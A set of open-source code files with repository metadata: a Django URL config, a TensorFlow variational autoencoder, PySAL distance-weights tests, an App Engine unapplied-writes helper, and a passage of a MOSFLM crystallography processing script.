url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name='about'),
# Django Admin, use {% url 'admin:index' %}
url(settings.ADMIN_URL, admin.site.urls),
# User management
url(r'^users/', include('neural_exploration.users.urls', namespace='users')),
url(r'^accounts/', include('allauth.urls')),
# Your stuff: custom urls includes go here
url(r'^spike/', include('neural_exploration.visualize.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception('Bad Request!')}),
url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception('Permission Denied')}),
url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception('Page not Found')}),
url(r'^500/$', default_views.server_error),
]
if 'debug_toolbar' in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns = [
url(r'^__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
|
brookefitzgerald/neural-exploration
|
config/urls.py
|
Python
|
mit
| 1,721
|
[
"VisIt"
] |
51d42cace981dee0589f80a86da7c0249a1d9a1652b27be8cb1e7b2b4242b7ff
|
import os
import sys
import datetime
import tensorflow as tf
import numpy as np
import prettytensor as pt
from convolutional_vae_util import deconv2d
from utils import *
class CVAE(object):
'''
CVAE: Convolutional Variational AutoEncoder
Builds a convolutional variational autoencoder that compresses
input_shape to latent_size and then back out again. It uses
the reparameterization trick and conv/conv transpose to achieve this.
'''
def __init__(self, sess, input_shape, batch_size, latent_size=128, e_dim=64, d_dim=64):
self.input_shape = input_shape
self.input_size = np.prod(input_shape)
self.latent_size = latent_size
self.e_dim = e_dim
self.d_dim = d_dim
self.iteration = 0
with tf.variable_scope(self.get_name()):
self.inputs = tf.placeholder(tf.float32, [None, self.input_size], name="inputs")
# z = mu + sigma * epsilon
# epsilon is a sample from a N(0, 1) distribution
with tf.variable_scope("z"): # Encode our data into z and return the mean and covariance
self.z_mean, self.z_log_sigma_sq = self.encoder(self.inputs, latent_size)
eps_batch = self.z_log_sigma_sq.get_shape().as_list()[0] \
if self.z_log_sigma_sq.get_shape().as_list()[0] is not None else batch_size
eps = tf.random_normal([eps_batch, latent_size], 0.0, 1.0, dtype=tf.float32)
self.z = tf.add(self.z_mean,
tf.mul(tf.sqrt(tf.exp(self.z_log_sigma_sq)), eps))
# Get the reconstructed mean from the decoder
self.x_reconstr_mean = self.decoder(self.z, self.input_size)
self.z_summary = tf.histogram_summary("z", self.z)
with tf.variable_scope("z", reuse=True): # The test z
self.z_mean_test, self.z_log_sigma_sq_test = self.encoder(self.inputs, latent_size, phase=pt.Phase.test)
eps_batch = self.z_log_sigma_sq.get_shape().as_list()[0] \
if self.z_log_sigma_sq.get_shape().as_list()[0] is not None else batch_size
eps = tf.random_normal([eps_batch, latent_size], 0.0, 1.0, dtype=tf.float32)
self.z_test = tf.add(self.z_mean_test,
tf.mul(tf.sqrt(tf.exp(self.z_log_sigma_sq_test)), eps))
# Get the reconstructed mean from the decoder
self.x_reconstr_mean_test = self.decoder(self.z_test, self.input_size, phase=pt.Phase.test)
# Optimize only on the training variables
self.loss, self.optimizer = self._create_loss_and_optimizer(self.inputs,
self.x_reconstr_mean,
self.z_log_sigma_sq,
self.z_mean)
self.loss_summary = tf.scalar_summary("loss", self.loss)
self.summaries = tf.merge_all_summaries()
self.summary_writer = tf.train.SummaryWriter("logs/" + self.get_name() + self.get_formatted_datetime(),
sess.graph)
self.saver = tf.train.Saver()
def save(self, sess, filename):
print 'saving cvae model to %s...' % filename
self.saver.save(sess, filename)
def load(self, sess, filename):
if os.path.isfile(filename):
print 'restoring cvae model from %s...' % filename
self.saver.restore(sess, filename)
def get_name(self):
return "cvae_input_%dx%d_latent%d_edim%d_ddim%d" % (self.input_shape[0],
self.input_shape[1],
self.latent_size,
self.e_dim,
self.d_dim)
def get_formatted_datetime(self):
return str(datetime.datetime.now()).replace(" ", "_") \
.replace("-", "_") \
.replace(":", "_")
# Taken from https://jmetzen.github.io/2015-11-27/vae.html
def _create_loss_and_optimizer(self, inputs, x_reconstr_mean, z_log_sigma_sq, z_mean):
# The loss is composed of two terms:
# 1.) The reconstruction loss (the negative log probability
# of the input under the reconstructed Bernoulli distribution
# induced by the decoder in the data space).
# This can be interpreted as the number of "nats" required
# for reconstructing the input when the activation in latent
# is given.
self.reconstr_loss = \
-tf.reduce_sum(inputs * tf.log(tf.clip_by_value(x_reconstr_mean, 1e-10, 1.0))
+ (1.0 - inputs) * tf.log(tf.clip_by_value(1.0 - x_reconstr_mean, 1e-10, 1.0)),
1)
# 2.) The latent loss, which is defined as the Kullback Libeler divergence
## between the distribution in latent space induced by the encoder on
# the data and some prior. This acts as a kind of regularize.
# This can be interpreted as the number of "nats" required
# for transmitting the the latent space distribution given
# the prior.
self.latent_loss = -0.5 * tf.reduce_sum(1.0 + z_log_sigma_sq
- tf.square(z_mean)
- tf.exp(z_log_sigma_sq), 1)
loss = tf.reduce_mean(self.reconstr_loss + self.latent_loss) # average over batch
optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(loss)
return loss, optimizer
def decoder(self, z, projection_size, activ=tf.nn.elu, phase=pt.Phase.train):
with pt.defaults_scope(activation_fn=activ,
batch_normalize=True,
learned_moments_update_rate=0.0003,
variance_epsilon=0.001,
scale_after_normalization=True,
phase=phase):
return (pt.wrap(z).
reshape([-1, 1, 1, self.latent_size]).
deconv2d(3, 128, edges='VALID', phase=phase).
deconv2d(5, 64, edges='VALID', phase=phase).
deconv2d(5, 32, stride=2, phase=phase).
deconv2d(5, 1, stride=2, activation_fn=tf.nn.sigmoid, phase=phase).
flatten()).tensor
def encoder(self, inputs, latent_size, activ=tf.nn.elu, phase=pt.Phase.train):
with pt.defaults_scope(activation_fn=activ,
batch_normalize=True,
learned_moments_update_rate=0.0003,
variance_epsilon=0.001,
scale_after_normalization=True,
phase=phase):
params = (pt.wrap(inputs).
reshape([-1, self.input_shape[0], self.input_shape[1], 1]).
conv2d(5, 32, stride=2).
conv2d(5, 64, stride=2).
conv2d(5, 128, edges='VALID').
#dropout(0.9).
flatten().
fully_connected(self.latent_size * 2, activation_fn=None)).tensor
mean = params[:, :self.latent_size]
stddev = params[:, self.latent_size:]
return [mean, stddev]
def partial_fit(self, sess, inputs):
"""Train model based on mini-batch of input data.
Return cost of mini-batch.
"""
inputs = self.normalize(inputs)
feed_dict = {self.inputs: inputs}
if self.iteration % 10 == 0:
_, summary, cost = sess.run([self.optimizer, self.summaries, self.loss],
feed_dict=feed_dict)
self.summary_writer.add_summary(summary, self.iteration)
else:
_, cost = sess.run([self.optimizer, self.loss],
feed_dict=feed_dict)
self.iteration += 1
return cost
def transform(self, sess, inputs):
"""
Transform data by mapping it into the latent space.
Taken from https://jmetzen.github.io/2015-11-27/vae.html
"""
# Note: This maps to mean of distribution, we could alternatively
# sample from Gaussian distribution
inputs = self.normalize(inputs)
feed_dict={self.inputs: inputs}
return sess.run(self.z_mean_test,
feed_dict=feed_dict)
def generate(self, sess, z_mu):
"""
Generate data by sampling from latent space.
Taken from https://jmetzen.github.io/2015-11-27/vae.html
"""
# Note: This maps to mean of distribution, we could alternatively
# sample from Gaussian distribution
feed_dict={self.z_test: z_mu}
return sess.run(self.x_reconstr_mean_test,
feed_dict=feed_dict)
def normalize(self, arr):
#return (arr - np.mean(arr)) / (np.std(arr) + 1e-9)
return arr
def reconstruct(self, sess, X):
"""
Use VAE to reconstruct given data.
Taken from https://jmetzen.github.io/2015-11-27/vae.html
"""
X = self.normalize(X)
feed_dict={self.inputs: X}
return sess.run(self.x_reconstr_mean_test,
feed_dict=feed_dict)
def train(self, sess, source, batch_size, training_epochs=10, display_step=5):
n_samples = source.train.num_examples
for epoch in range(training_epochs):
avg_cost = 0.
total_batch = int(n_samples / batch_size)
# Loop over all batches
for i in range(total_batch):
batch_xs, _ = source.train.next_batch(batch_size)
# Fit training using batch data
cost = self.partial_fit(sess, batch_xs)
# Compute average loss
avg_cost += cost / n_samples * batch_size
# Display logs per epoch step
if epoch % display_step == 0:
print "[Epoch:", '%04d]' % (epoch+1), \
"current cost = ", "{:.9f} | ".format(cost), \
"avg cost = ", "{:.9f}".format(avg_cost)
|
jramapuram/CVAE
|
cvae.py
|
Python
|
mit
| 10,644
|
[
"Gaussian"
] |
b82bd1db56273100e035f474d35ac2269c41a90886560f1f2c620f92158cfa6f
|
from pysal.weights import Distance as d
from pysal.weights.util import get_points_array
from pysal.weights import Contiguity as c
from pysal.common import RTOL, ATOL
from pysal.cg.kdtree import KDTree
import numpy as np
import pysal as ps
import unittest as ut
PANDAS_EXTINCT = ps.common.pandas is None
# All instances should test these four methods, and define their own functional
# tests based on common codepaths/estimated weights use cases.
class Distance_Mixin(object):
polygon_path = ps.examples.get_path('columbus.shp')
arc_path = ps.examples.get_path('stl_hom.shp')
points = [(10, 10), (20, 10), (40, 10),
(15, 20), (30, 20), (30, 30)]
euclidean_kdt = ps.cg.KDTree(points, distance_metric='euclidean')
polygon_f = ps.open(polygon_path) # our file handler
poly_centroids = get_points_array(polygon_f) # our iterable
polygon_f.seek(0) #go back to head of file
arc_f = ps.open(arc_path)
ps.cg.sphere.arcdist
arc_points = get_points_array(arc_f)
arc_f.seek(0)
arc_kdt = ps.cg.KDTree(arc_points, distance_metric='Arc',
radius=ps.cg.sphere.RADIUS_EARTH_KM)
cls = object # class constructor
known_wi = None #index of known w entry to compare
known_w = dict() #actual w entry
known_name = known_wi
def setUp(self):
self.__dict__.update({k:v for k,v in Distance_Mixin.__dict__.items()
if not k.startswith('_')})
def test_init(self):
# test vanilla, named
raise NotImplementedError('You need to implement this test '
'before this module will pass')
def test_from_shapefile(self):
# test vanilla, named, sparse
raise NotImplementedError('You need to implement this test '
'before this module will pass')
def test_from_array(self):
# test named, sparse
raise NotImplementedError('You need to implement this test '
'before this module will pass')
def test_from_dataframe(self):
# test named, columnar, defau
raise NotImplementedError('You need to implement this test '
'before this module will pass')
class Test_KNN(ut.TestCase, Distance_Mixin):
def setUp(self):
Distance_Mixin.setUp(self)
self.known_wi0 = 7
self.known_w0 = [3, 6, 12, 11]
self.known_wi1 = 0
self.known_w1 = [2, 1, 3 ,7]
self.known_wi2 = 4
self.known_w2 = [1, 3, 9, 12]
self.known_wi3 = 40
self.known_w3 = [31, 38, 45, 49]
##########################
# Classmethod tests #
##########################
def test_init(self):
w = d.KNN(self.euclidean_kdt, k=2)
self.assertEqual(w.neighbors[0], [1,3])
@ut.skipIf(PANDAS_EXTINCT, 'Missing pandas')
def test_from_dataframe(self):
df = ps.pdio.read_files(self.polygon_path)
w = d.KNN.from_dataframe(df, k=4)
self.assertEqual(w.neighbors[self.known_wi0], self.known_w0)
self.assertEqual(w.neighbors[self.known_wi1], self.known_w1)
perm = df.sample(frac=1)
w = d.KNN.from_dataframe(perm, k=4)
with self.assertRaises(AssertionError):
assert w.id_order == df.index.tolist()
self.assertEqual(perm.index.tolist(), w.id_order)
def test_from_array(self):
w = d.KNN.from_array(self.poly_centroids, k=4)
self.assertEqual(w.neighbors[self.known_wi0], self.known_w0)
self.assertEqual(w.neighbors[self.known_wi1], self.known_w1)
def test_from_shapefile(self):
w = d.KNN.from_shapefile(self.polygon_path, k=4)
self.assertEqual(w.neighbors[self.known_wi0], self.known_w0)
self.assertEqual(w.neighbors[self.known_wi1], self.known_w1)
##########################
# Function/User tests #
##########################
def test_reweight(self):
w = d.KNN(self.points, k=2)
new_point = [(21,21)]
wnew = w.reweight(k=4, p=1, new_data=new_point, inplace=False)
self.assertEqual(wnew[0], {1: 1.0, 3: 1.0, 4: 1.0, 6: 1.0})
class Test_DistanceBand(ut.TestCase, Distance_Mixin):
def setUp(self):
Distance_Mixin.setUp(self)
self.grid_path = ps.examples.get_path('lattice10x10.shp')
self.grid_rook_w = c.Rook.from_shapefile(self.grid_path)
self.grid_f = ps.open(self.grid_path)
self.grid_points = get_points_array(self.grid_f)
self.grid_f.seek(0)
self.grid_kdt = KDTree(self.grid_points)
##########################
# Classmethod tests #
##########################
def test_init(self):
w = d.DistanceBand(self.grid_kdt, 1)
for k,v in w:
self.assertEquals(v, self.grid_rook_w[k])
def test_from_shapefile(self):
w = d.DistanceBand.from_shapefile(self.grid_path, 1)
for k,v in w:
self.assertEquals(v, self.grid_rook_w[k])
def test_from_array(self):
w = d.DistanceBand.from_array(self.grid_points, 1)
for k,v in w:
self.assertEquals(v, self.grid_rook_w[k])
@ut.skipIf(PANDAS_EXTINCT, 'Missing pandas')
def test_from_dataframe(self):
import pandas as pd
geom_series = ps.pdio.shp.shp2series(self.grid_path)
random_data = np.random.random(size=len(geom_series))
df = pd.DataFrame({'obs':random_data, 'geometry':geom_series})
w = d.DistanceBand.from_dataframe(df, 1)
for k,v in w:
self.assertEquals(v, self.grid_rook_w[k])
perm = df.sample(frac=1)
w = d.DistanceBand.from_dataframe(perm, 1)
with self.assertRaises(AssertionError):
assert w.id_order == df.index.tolist()
self.assertEqual(w.id_order, perm.index.tolist())
##########################
# Function/User tests #
##########################
def test_integers(self):
"""
see issue #126
"""
grid_integers = [tuple(map(int, poly.vertices[0]))
for poly in self.grid_f]
self.grid_f.seek(0)
grid_dbw = d.DistanceBand(grid_integers, 1)
for k,v in grid_dbw:
self.assertEquals(v, self.grid_rook_w[k])
def test_arcdist(self):
arc = ps.cg.sphere.arcdist
kdt = KDTree(self.arc_points, distance_metric='Arc',
radius=ps.cg.sphere.RADIUS_EARTH_KM)
npoints = self.arc_points.shape[0]
full = np.matrix([[arc(self.arc_points[i], self.arc_points[j])
for j in xrange(npoints)]
for i in xrange(npoints)])
maxdist = full.max()
w = d.DistanceBand(kdt, maxdist, binary=False, alpha=1.0)
np.testing.assert_allclose(w.sparse.todense(), full)
def test_dense(self):
w_rook = ps.weights.Rook.from_shapefile(
ps.examples.get_path('lattice10x10.shp'))
polys = ps.open(ps.examples.get_path('lattice10x10.shp'))
centroids = [p.centroid for p in polys]
w_db = d.DistanceBand(centroids, 1, build_sp=False)
for k in w_db.id_order:
np.testing.assert_equal(w_db[k], w_rook[k])
class Test_Kernel(ut.TestCase, Distance_Mixin):
def setUp(self):
Distance_Mixin.setUp(self)
self.known_wi0 = 0
self.known_w0 = {0: 1, 1: 0.500000049999995, 3: 0.4409830615267465}
self.known_wi1 = 0
self.known_w1 = {0: 1.0, 1: 0.33333333333333337,
3: 0.2546440075000701}
self.known_w1_bw = 15.
self.known_wi2 = 0
self.known_w2 = {0: 1.0, 1: 0.59999999999999998,
3: 0.55278640450004202, 4: 0.10557280900008403}
self.known_w2_bws = [25.0, 15.0, 25.0, 16.0, 14.5, 25.0]
self.known_wi3 = 0
self.known_w3 = [1.0, 0.10557289844279438, 9.9999990066379496e-08]
self.known_w3_abws =[[11.180341005532938], [11.180341005532938],
[20.000002000000002], [11.180341005532938],
[14.142137037944515], [18.027758180095585]]
self.known_wi4 = 0
self.known_w4 = {0: 0.3989422804014327,
1: 0.26741902915776961,
3: 0.24197074871621341}
self.known_w4_abws = self.known_w3_abws
self.known_wi5 = 1
self.known_w5 = {4: 0.0070787731484506233,
2: 0.2052478782400463,
3: 0.23051223027663237,
1: 1.0}
self.known_wi6 = 0
self.known_w6 = {0: 1.0, 2: 0.03178906767736345,
1: 9.9999990066379496e-08}
#stick answers & params here
##########################
# Classmethod tests #
##########################
def test_init(self):
w = d.Kernel(self.euclidean_kdt)
for k,v in w[self.known_wi0].items():
np.testing.assert_allclose(v, self.known_w0[k], rtol=RTOL)
def test_from_shapefile(self):
w = d.Kernel.from_shapefile(self.polygon_path, idVariable='POLYID')
for k,v in w[self.known_wi5].items():
np.testing.assert_allclose((k,v), (k,self.known_w5[k]), rtol=RTOL)
w = d.Kernel.from_shapefile(self.polygon_path, fixed=False)
for k,v in w[self.known_wi6].items():
np.testing.assert_allclose((k,v), (k,self.known_w6[k]), rtol=RTOL)
def test_from_array(self):
w = d.Kernel.from_array(self.points)
for k,v in w[self.known_wi0].items():
np.testing.assert_allclose(v, self.known_w0[k], rtol=RTOL)
@ut.skipIf(PANDAS_EXTINCT, 'Missing pandas')
def test_from_dataframe(self):
df = ps.pdio.read_files(self.polygon_path)
w = d.Kernel.from_dataframe(df)
for k,v in w[self.known_wi5-1].items():
np.testing.assert_allclose(v, self.known_w5[k+1], rtol=RTOL)
perm = df.sample(frac=1)
w = d.Kernel.from_dataframe(perm)
with self.assertRaises(AssertionError):
assert w.id_order == df.index.tolist()
self.assertEqual(w.id_order, perm.index.tolist())
##########################
# Function/User tests #
##########################
def test_fixed_bandwidth(self):
w = d.Kernel(self.points, bandwidth=15.0)
for k,v in w[self.known_wi1].items():
np.testing.assert_allclose((k,v), (k, self.known_w1[k]))
np.testing.assert_allclose(np.ones((w.n,1))*15, w.bandwidth)
w = d.Kernel(self.points, bandwidth=self.known_w2_bws)
for k,v in w[self.known_wi2].items():
np.testing.assert_allclose((k,v), (k, self.known_w2[k]), rtol=RTOL)
for i in range(w.n):
np.testing.assert_allclose(w.bandwidth[i], self.known_w2_bws[i], rtol=RTOL)
def test_adaptive_bandwidth(self):
w = d.Kernel(self.points, fixed=False)
np.testing.assert_allclose(sorted(w[self.known_wi3].values()),
sorted(self.known_w3), rtol=RTOL)
bws = w.bandwidth.tolist()
np.testing.assert_allclose(bws, self.known_w3_abws, rtol=RTOL)
w = d.Kernel(self.points, fixed=False, function='gaussian')
for k,v in w[self.known_wi4].items():
np.testing.assert_allclose((k,v), (k, self.known_w4[k]), rtol=RTOL)
bws = w.bandwidth.tolist()
np.testing.assert_allclose(bws, self.known_w4_abws, rtol=RTOL)
knn = ut.TestLoader().loadTestsFromTestCase(Test_KNN)
kern = ut.TestLoader().loadTestsFromTestCase(Test_Kernel)
db = ut.TestLoader().loadTestsFromTestCase(Test_DistanceBand)
suite = ut.TestSuite([knn, kern, db])
if __name__ == '__main__':
runner = ut.TextTestRunner()
runner.run(suite)
|
ljwolf/pysal
|
pysal/weights/tests/test_Distance.py
|
Python
|
bsd-3-clause
| 11,865
|
[
"COLUMBUS",
"Gaussian"
] |
ac71b1d5920237fcd764ac724ef42e390a75e8ab6d5af1ea1b7ec17668c18892
|
#!/usr/bin/env python
# Copyright (C) 2010-2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Methods to fix unapplied writes.
Unapplied writes are stored in the datastore as entities where the
child node of the entity key has kind __unapplied_write__OriginalKind.
This module contains methods for applying those writes.
Currently it contains methods which work at the datastore low level API.
Sample usage using remote_api:
* Enable remote_api for your application
(see https://developers.google.com/appengine/articles/remote_api)
* Change to a directory where this module exists.
* Run remote_api_shell.py -s apply-writes.your-app-id.appspot.com
* In the remote_api_shell, run the following:
import apply_unapplied_writes
apply_unapplied_writes.apply_entity_by_name(YOURKIND, A KEY NAME OR ID)
Sample usage using the map reduce framework:
* Install the map reduce framework in your app.
(see http://code.google.com/p/appengine-mapreduce/)
* Add this module to your app.
* Add the following to the mapreduce.yaml file:
mapreduce:
- name: "Apply Unapplied Entity Writes"
mapper:
input_reader: mapreduce.input_readers.DatastoreInputReader
handler: apply_unapplied_writes.apply_model_instance
params:
- name: entity_kind
default: models.__unapplied_write__MyModel
* Visit https://apply-writes-dot-your-app-id.appspot.com/mapreduce/
* Select 'Apply Unapplied Entity Writes' from the dropdown.
* Enter the kind you wish to apply.
* Click Launch Job.
"""
import logging
from google.appengine.api import datastore
UNAPPLIED_WRITE_KIND_PREFIX = '__unapplied_write__'
UNAPPLIED_WRITE_KIND_PREFIX_LEN = len(UNAPPLIED_WRITE_KIND_PREFIX)
def apply_entity(unapplied_entity, delete_unapplied_entity=True):
"""Re-write an entity representing an unapplied write to apply it.
Args:
entity: An app engine datastore entity, typically loaded by datastore.Get.
This will not work for a model instance, e.g. one loaded from db.get.
delete_unapplied_entity: If true, the record of the unapplied write will
be removed from the datastore.
"""
key = unapplied_entity.key()
path = unapplied_entity.key().to_path()
kind = path[-2]
if not kind.startswith(UNAPPLIED_WRITE_KIND_PREFIX):
logging.Error("Attempting to apply an already applied write: %r", key)
return
kind = kind[UNAPPLIED_WRITE_KIND_PREFIX_LEN:]
id_or_name = path[-1]
namespace = unapplied_entity.namespace()
# You can insert code here to change id_or_name.
if isinstance(id_or_name, basestring):
entity_to_apply = datastore.Entity(kind, key.parent(), name=id_or_name,
namespace=namespace)
elif id_or_name:
entity_to_apply = datastore.Entity(kind, key.parent(), id=id_or_name,
namespace=namespace)
else:
entity_to_apply = datastore.Entity(kind, key.parent(),
namespace=namespace)
entity_to_apply.update(unapplied_entity)
# You can insert code here to change entity_to_apply.
datastore.Put(entity_to_apply)
if delete_unapplied_entity:
datastore.Delete(unapplied_entity)
def apply_entity_by_name(kind, id_or_name, parent=None,
delete_unapplied_entity=True):
"""Apply an unapplied write for a given kind and id or name.
This will load and apply an unapplied write for the identified
entity.
Args:
kind: The kind of the entity to apply.
id_or_name: The numeric ID or string name of the entity to find and apply.
parent: Parent key for the entity to apply.
delete_unapplied_entity: If true, the record of the unapplied write will
be removed from the datastore.
"""
if parent:
path = parent.to_path()
else:
path = []
path += [UNAPPLIED_WRITE_KIND_PREFIX + kind, id_or_name]
key = datastore.Key.from_path(*path)
unapplied_entity = datastore.Get(key)
apply_entity(unapplied_entity, delete_unapplied_entity)
def apply_model_instance(model_instance, delete_unapplied_entity=True):
"""Apply an unapplied write from a model instance.
This is a wrapper for apply_entity, suitable for use with the
App Engine mapper framework.
Args:
model_instance. This is typically the result of a db.get or db.Query.get.
delete_unapplied_entity: If true, the record of the unapplied write will
be removed from the datastore.
"""
unapplied_entity = model_instance._populate_entity()
apply_entity(unapplied_entity, delete_unapplied_entity)
|
googlearchive/appengine-recover-unapplied-writes-python
|
apply_unapplied_writes.py
|
Python
|
apache-2.0
| 5,104
|
[
"VisIt"
] |
462331a0263a4c2ce177ad666672abd085428fb39a4dc48b943fe9591a919091
|
#################################################################
# #
# Integrate images with MOSFLM and merge with SCALA #
# #
# Copyright: Molecular Images 2007 #
# #
# This script is distributed under the same conditions as MIFit #
# #
#################################################################
import sys
import os
import getopt
import time
import string
import dircache
import ccp4check
def Usage():
print "Usage: %s [options]" % sys.argv[0]
print "Options are:"
print " -t,--template_image=FILE: name of template image file"
print " -s,--spacegroup=NUM the space group number"
print " -f,--first_image=NUM first image number to process, has default"
print " -l,--last_image=NUM last image number to process, has default"
print " -i,--integrate_resolution=STRING integrate resolution, if any"
print " -g,--batch_prefix=NUM group number, prefix for batch. default: 1"
print " -o,--index_only=no or yes only test index the images. default: no"
print " -w,--workdir=DIR the working directory. default: image directory"
print " -d,--detector_constants=FILE file for detector constants: default: none"
print " -?,--help this help message"
def Run(argv=None):
if argv is None:
argv=sys.argv
# Initialize
first_image = 'none'
last_image = 'none'
dt_spacegroup = 'none'
image_name = 'none'
final_workdir = 'none'
integrate_res = 'none'
merging_res = 'none'
index_only = 'no'
integrate_res = 'none'
batch_prefix = 'none'
detector_constants = 'none'
beam_x_image = 'none'
beam_y_image = 'none'
image_extension = 4
gain = '1.0'
quote = '''"'''
##################
# Parse args #
##################
args = argv[1:]
optlist, args = getopt.getopt(
args,'t:s:w:f:l:i:m:g:o:d:?',
['template_image=','spacegroup=','first_image=',
'last_image=','integrate_resolution=','merge_resolution=',
'batch_prefix=','index_only=','workdir=','detector_constants=',
'help'])
number_of_inputs = len(optlist)
if number_of_inputs==0:
Usage()
return
count = 0
while count < number_of_inputs:
aList = optlist[count]
number_of_list_inputs = len(aList)
if number_of_list_inputs >=1:
arg_value = aList[0]
if arg_value=='-?' or arg_value=='--help':
Usage()
return
if number_of_list_inputs >=2:
param_value = aList[1]
if arg_value == '-t' or arg_value=='--template_image':
image_name = param_value
elif arg_value == '-s' or arg_value=='--spacegroup':
dt_spacegroup = param_value
elif arg_value == '-f' or arg_value=='--first_image':
first_image = param_value
elif arg_value == '-l' or arg_value=='--last_image':
last_image = param_value
elif arg_value == '-i' or arg_value=='--integrate_resolution':
integrate_res = param_value
elif arg_value == '-g' or arg_value=='--batch_prefix':
batch_prefix = param_value
elif arg_value == '-o' or arg_value=='--index_only':
index_only = param_value
elif arg_value == '-w' or arg_value=='--workdir':
final_workdir = param_value
elif arg_value == '-d' or arg_value=='--detector_constants':
detector_constants = param_value
count = count + 1
#######################
# Checks and defaults #
#######################
ccp4,error = ccp4check.ccp4check()
if not ccp4:
print '\n' + error + '\n'
time.sleep(4)
return 1
ipmosflm_path = 'ipmosflm'
# Check for image directory
fileexists = os.path.exists(image_name)
if fileexists == 0:
print 'The template image was not found:',image_name
time.sleep(4)
return 1
# Check for processed file directory
filexists = os.path.exists(final_workdir)
if fileexists == 0 and final_workdir != 'none':
print 'The final directory for processed data was not found:',final_workdir
time.sleep(4)
return 1
# Check for space group
if dt_spacegroup == 'none':
print 'The space group number was not given'
time.sleep(4)
return 1
# Set data run identification
if batch_prefix == 'none':
data_code_number = '1'
else:
data_code_number = batch_prefix
####################################################
# Establish image template from example image file #
####################################################
image_dir = os.path.dirname(image_name)
image_name = os.path.basename(image_name)
# Check that image files have extension .img or .osc preceeded by a 3 or 4 digit number
if image_name.find('.img') > -1 or image_name.find('.osc') > -1:
image_name_split = image_name.split('.')
image_name_root = image_name_split[0]
i_end = len(image_name_root)
i_start = i_end - 4
image_number = image_name_root[i_start:i_end]
if image_number.isdigit() == 1:
image_number = int(image_number)
image_extension = 4
else:
i_start = i_end - 3
image_number = image_name_root[i_start:i_end]
image_extension = 3
if image_number.isdigit() == 1:
image_number = int(image_number)
else:
print '\nImage file names must contain 3 or 4 digits preceeding extension .osc/.img\n'
time.sleep(4)
return 1
# Establish MOSFLM template file name
num = len(image_name)
if image_extension == 3:
num = num - 7
hashes = '###'
elif image_extension == 4:
num = num - 8
hashes = '####'
image_name_nodigits = image_name[0:num]
if image_name.find('.img') > -1:
mosflm_template = image_name_nodigits + hashes + '.img'
elif image_name.find('.osc') > -1:
mosflm_template = image_name_nodigits + hashes + '.osc'
filename_spt = image_name[0:num-1] + '.spt'
else:
print '\nImage file names must contain 3 or 4 digits preceeding extension .osc/.img\n'
time.sleep(4)
return 1
#############################################
# Check image folder to find image ranges #
#############################################
image_number_low = 9999
image_number_high = -9999
aList_dir = dircache.listdir(image_dir)
number_files = len(aList_dir)
count = 0
while count < number_files:
imagefile = aList_dir[count]
imagefile = os.path.basename(imagefile)
if imagefile.find('.img') > -1 or imagefile.find('.osc') > -1:
if imagefile.find(image_name_nodigits) > -1:
imagefilename_length = len(imagefile)
if image_extension == 3:
i1 = imagefilename_length - 7
i2 = imagefilename_length - 4
elif image_extension == 4:
i1 = imagefilename_length - 8
i2 = imagefilename_length - 4
image_number = imagefile[i1:i2]
if image_number.isdigit() == 1:
image_number = int(image_number)
if image_number < image_number_low:
image_number_low = image_number
if image_number > image_number_high:
image_number_high = image_number
count = count + 1
# Checks
if image_number_low == 9999:
print '\nFirst image number was not determined\n'
time.sleep(4)
return 1
if image_number_high == -9999:
print '\nLast image number was not determined\n'
time.sleep(4)
return 1
# Set image numbers to integrate per user specification else use all images from directory analysis
if first_image != 'none':
image_number_low = int(first_image)
else:
first_image = str(image_number_low)
if last_image != 'none':
image_number_high = int(last_image)
else:
last_image = str(image_number_high)
#############################
# Setup program parameters #
#############################
# Total number of images
number_images = image_number_high - image_number_low + 1
if number_images < 10:
print '\nImages in this data set only', str(image_number_low), ' to ', str(image_number_high),' so not processing\n'
time.sleep(4)
return 1
# Starting indexing and refinement images
index_first = image_number_low
refine_segment1_first = image_number_low
refine_segment1_last = image_number_low + 3
cell_refine_images_segment1 = str(refine_segment1_first) + ' to ' + str(refine_segment1_last)
# Orthogonal images for refinement
second_index = 90
if number_images > second_index:
index_second = image_number_low + second_index - 1
refine_segment2_last = image_number_low + second_index -1
else:
index_second = image_number_high
refine_segment2_last = image_number_high
refine_segment2_first = refine_segment2_last - 3
cell_refine_images_segment2 = str(refine_segment2_first) + ' to ' + str(refine_segment2_last)
# Intermediate images for refinement
refine_segment12_first = (refine_segment1_first + refine_segment2_first)/2
refine_segment12_first = int(refine_segment12_first)
refine_segment12_last = refine_segment12_first + 3
cell_refine_images_segment12 = str(refine_segment12_first) + ' to ' + str(refine_segment12_last)
# Orthogonal images ranges for initial index and for possible reindexing pass
image_seq_find = str(index_first) + ' ' + str(index_second)
image_seq_reindex = str(index_first) + ' ' + str(refine_segment12_first) + ' ' + str(index_second)
# Collect user-defined beamcenter or distance data from a special constants file
beam_x = 'none'
beam_y = 'none'
xtal_detector_distance = 'none'
fileexists = os.path.exists(detector_constants)
if fileexists != 0 and detector_constants != 'none':
file = open(detector_constants,'r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('beam_center') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args > 2:
beam_x = aLine[1]
beam_y = aLine[2]
else:
print 'There should be two numbers on the beam_center line'
time.sleep(4)
return 1
if eachLine.find('xtal_detector_distance') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args > 1:
xtal_detector_distance = aLine[1]
else:
print 'There should be one number on the xtal_detector_distance line'
time.sleep(4)
return 1
if eachLine.find('detector_gain') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args > 1:
detector_gain = aLine[1]
else:
print 'There should be one number on the detector_gain line'
time.sleep(4)
return 1
##########
# Start #
##########
print '\nAutomated integration and merging\n'
print 'Image directory:',image_dir
